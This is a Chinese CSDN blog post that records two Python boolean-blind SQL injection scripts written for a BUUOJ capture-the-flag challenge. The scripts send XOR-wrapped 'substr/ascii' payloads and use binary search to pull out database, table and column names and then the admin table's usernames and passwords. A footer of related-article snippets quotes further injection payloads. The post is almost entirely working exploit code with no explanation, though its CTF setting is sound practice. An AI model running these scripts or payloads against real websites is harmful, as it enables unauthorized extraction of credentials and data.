记录一下盲注脚本

最新推荐文章于 2022-05-20 19:44:21 发布
最新推荐文章于 2022-05-20 19:44:21 发布
阅读量2.3k 收藏
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124352735
版权

SQL注入 二分法 数据库探测 Web安全 信息提取
关键词由CSDN通过智能技术生成 
import requests

url= 'http://46206bf0-67f6-43a5-ac69-5d26d094e942.node4.buuoj.cn:81/backend/content_detail.php'

database =""

payload1 = "?id=1^(ascii(substr((select(database())),{},1))>{})^1" #库名为news
payload2 = "?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1"#表名为admin,contents
payload3 ="?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),{},1))>{})^1" #列名为flag,value
payload4 = "?id=1^(ascii(substr((select(group_concat(id,0x3a,username,0x3a,password))from(admin)),{},1))>{})^1"
for i in range(1,10000):#二分法
    low = 28
    high = 137
    mid =(low + high) // 2
    while(low < high):
        #payload = payload1.format(i,mid)  #查库名
        #payload = payload2.format(i,mid)  #查表名
        #payload = payload3.format(i,mid)  #查列名
        payload = payload4.format(i,mid) #查flag

        new_url = url + payload
        r = requests.get(new_url)
        #text=str(r.json())
        #print(new_url)
        if "title" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) //2
    if (mid == 32 or mid == 128):
        break
    #chr()返回ascii对应的字符
    database +=chr(mid)
    print(database)

print(database)

import  time
import re
import requests
import string

url = "http://46206bf0-67f6-43a5-ac69-5d26d094e942.node4.buuoj.cn:81/backend/content_detail.php"
flag = ''

def payload(i, j):
    time.sleep(0.2)
    # 数据库名字ord()返回对应的ascii值,chr()返回ascii对应的字符
    #sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名admin,contents
    #sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),%d,1))>%d)^1"%(i,j)
    # 字段名
    #sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    sql = "1^(ord(substr((select(group_concat(username,0x3a,password))from(admin)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    if "title" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

-栀蓝-
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
时间盲注python脚本.zip
12-28
首先,我们来详细了解一下时间盲注的基本原理。当服务器执行带有用户输入的SQL查询时,如果查询执行时间较长(例如,因为包含了不正确的WHERE条件),则服务器响应会相对较慢。反之,如果查询快速完成,服务器响应则...
CTF 中的 SQL 注入总结
重新启程
10-12 4819
flag 常见表 1 select flag from flag SQL 注入的基本原理 1 2 3 select * from user where username='' and pass='' # 构造 username=devnull' or '1后,sql 语句变成 select * from us...
Web_SQL注入(1)
Lemon's blog
07-15 584
[GYCTF2020]Blacklist ——涉及新知识HANDLER ... OPEN等、堆叠注入 这道题和之前做那道强网杯的题目一样,但之前的方法比如读取flag时改表名或者是用SQL的预处理进行绕过都不可行了,因为过滤了set prepare alter rename 所以这里就涉及到了一种新的方法 HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关
SQL Labs刷题补坑记录(less1-less30)
weixin_30376453的博客
08-10 323
补坑加1,这几天快速刷一下sqllabs 来巩固下sql注入基础吧,也算是把很久以前没刷的过一遍,do it! 第一部分: LESS1: 直接报错,有回显的注入, http://localhost/sqli-labs-master/Less-1/?id=1' order by 3--+ 就可以确定字段然后使用union查询即可 http://localhost/sqli-la...
BUUOJ-web刷题wp(二)
Theseus_sky的博客
07-16 707
特辑篇-极客大挑战2019 [极客大挑战 2019]EasySQL 万能密码如下:直接登录显示flag [极客大挑战 2019]Havefun F12看一下,发现那串注释,尝试get数据?cat=dog y1s1,这猫还是很可爱的,下面的有道题也是!!玩了半天哈哈哈 [极客大挑战 2019]Secret File 查看源代码,发现Archive.room.php,打开看看 按一下按钮 可能是跳转太快了,抓一下包。 发现提示,进入 又现提示flag.php,进入看看 网页源代码看不见,猜测是写
-------已搬运------SQL注入的 过滤 思路 payload 万能密码
Zero_Adam的博客
04-28 1577
目录:一、过滤关键词:1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:3. `,`逗号被过滤了:1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`2.`limit 0,1` 用这个来代替:`limit 1 offset {}`二、一些小trick1. 关于bool盲注的正确与否三、一些payload:1. 过滤了 空格,但是可以联合查询的bool注
sql盲注检测的简单脚本.zip
03-10
这个"sql盲注检测的简单脚本.zip"压缩包很可能包含了用于检测这种安全问题的脚本工具。 SQL盲注的基本原理是利用Web应用对用户输入数据的不当处理。如果一个应用直接将用户输入的参数拼接到SQL查询中,而没有进行...
python连接sqlserver数据库自己写的盲注sqlserver的python脚本
最新发布
04-24
盲注SQL Server是指在没有返回完整结果的情况下,通过判断查询是否影响了数据库的状态(例如,查询是否改变了某些记录的数量)来获取信息。这通常涉及到对查询结果进行条件测试,例如检查某个操作是否导致了错误或...
sql盲注拦截器配置文件
11-20
6. **日志记录和报警**:记录被拦截的请求,以便于分析和调查。当发现潜在攻击时,可以触发报警机制,通知系统管理员。 XSS(Cross-Site Scripting)攻击是另一种常见的安全问题,它涉及在用户的浏览器上执行恶意...
手工盲注辅助注入工具Blind-SQL-Injector.zip
07-18
5. **日志记录**:记录测试过程,方便分析和复盘,有助于理解和优化注入策略。 6. **跨平台**:作为开源项目,Blind-SQL-Injector通常支持多平台运行,如Windows、Linux和Mac OS。 **使用Blind-SQL-Injector的步骤...
信安之路 第六周数据库注入语句
小白渣的博客
09-20 1152
学习目标:能看懂大部分的sql语句,做到给一个复杂的sql语句能看懂,知道是干什么用的,为什么这么写. #第一部分:获取payload 通过sqlmap awvs等工具 更新sqlmap 内容太多,先放弃了 用着再查 通过谷歌 第二部分:基础 1、注入的分类: 基于从服务器接收到的响应 ▲基于错误的 SQL 注入 在URL加入了一些错误的SQL语句,被执行后返回了异常信息,这些异常信息当中包含...
SQL-LABS GET型布尔盲注脚本(node)
AaronLuo
09-03 351
原理 基于SQL-LABS LESS-5,LESS-8 GET型布尔注入,(布尔盲注详解),,基于MSQL 布尔盲注,主要是判断ascii码值是否与猜测的值相同,通过判断页面变化,确定ascii值 由于0-z的ascii值是48-122,256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7 ,通过按位与运算8次,结果相加...
SQL 盲注GET /POST、布尔型,延时型Python脚本
小锤队长的博客
08-09 4292
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql注入之 GET传参 之 布尔型: import requests result = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...
buuctf-颜值成绩查询(sql注入)
m0_62094846的博客
05-15 543
输入1-4都是可以的,从5开始就不存在了 多半就是sql注入,但是限制了输入的数据,就只能用报错注入或者盲注了 但尝试后发现,报错注入、布尔盲注和时间盲注都不行,都回显not exists 尝试一下异或注入 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1 这是正确的结果 错误的结果是这样的 通过这个可以最终得到flag 别人...
一道盲注题目,对注释符、空格的过滤。
小学生的博客
05-20 225
FinalSQL 一道忙注题目 正确回显:(字符ASCII大于32) http://29675b84-d078-45ef-943b-ef5ccae7535a.node4.buuoj.cn:81/search.php?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),1,1))>32)^1 错误回显:小于32 跑表的核心语句: i
php的盲注脚本怎么写,sqlite注入和Python实现sqlite自动盲注脚本
weixin_31714129的博客
04-14 363
PHP中自带处理sqlite的类,要使用直接继承SQLite3类然后重写构造方法__construct()指定db文件class MyDB extends SQLite3{function __construct(){$this->open(‘test.db’);}}实例化类,判断是否连接成功$db = new MyDB();if(!$db){echo $db->lastErrorMs...
【CTF_流量日志分析】二分法盲注分析
serendipity1130的博客
10-16 1769
1.打开日志文件发现又是一道二分法盲注流量,观察任意几条: 分析过程: 当状态码位200的时候,表示正确,报错为404,所以第21位大于101正确,大于102报错,所以正确字符为101,所以盲注出来的字符串应该是状态码等于200时的字符或等于404时的ascii码减去1 2.根据以上分析写出脚本: import urllib.parse import requests,re f = open('日志里的秘密.log','r',encoding='gb18030',errors='ignore
[GYCTF2020]Ezsqli(无列名注入)
weixin_43940853的博客
05-16 5122
[GYCTF2020]Ezsqli 过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了 当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键 接下来就可以写脚本判断表名了 import requests url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' payload = '2||ascii(substr((select group_concat
SQL注入----盲注
weixin_45922278的博客
10-17 151
盲注 注入攻击的本质,是把用户输入的数据当做代码执行. 1.是用户能够控制输入 2.是原本程序要执行的代码,拼接了用户输入的数据. 盲注 布尔盲注 : order by ,没有显示注入点 对错只显示有无数据 延时盲注 :页面无论怎么搞都不变 盲注需要掌握的几个函数 length() 返回字符串的长度 substr(...
sql注入布尔盲注脚本
08-23
对于SQL注入布尔盲注攻击,你可以使用以下脚本示例: ``` SELECT * FROM users WHERE username = 'admin' AND IF(LENGTH(database()) > 1, SLEEP(5), 0); SELECT * FROM users WHERE username = 'admin' AND IF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值